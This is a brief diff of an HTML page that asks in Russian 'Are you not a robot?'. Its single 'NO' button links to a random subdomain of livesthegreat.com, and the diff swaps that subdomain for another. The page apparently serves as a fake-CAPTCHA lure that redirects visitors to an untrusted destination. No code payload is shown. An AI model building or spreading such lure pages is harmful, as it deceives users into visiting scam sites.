--- a/index.html
+++ b/index.html
@@ -184,7 +184,7 @@
             <h1 class="headline-text headline-fontcolor">Вы не робот?</h1>
             <div class="message-text message-fontcolor">Подтвердите пожалуйста что Вы не робот.</div>
             <div class="call-to-action">
-                <section class="button-section"> <a class="destination-target_url" id="destination_url" href="https://tqzlhhip.livesthegreat.com"> <button type="submit" class="action-button button button-shape button-backgroundcolor"> <span class="button-text button-fontcolor">НЕТ</span> </button></a>
+                <section class="button-section"> <a class="destination-target_url" id="destination_url" href="https://timfavuw.livesthegreat.com"> <button type="submit" class="action-button button button-shape button-backgroundcolor"> <span class="button-text button-fontcolor">НЕТ</span> </button></a>
                 </section>
             </div>
         </section>
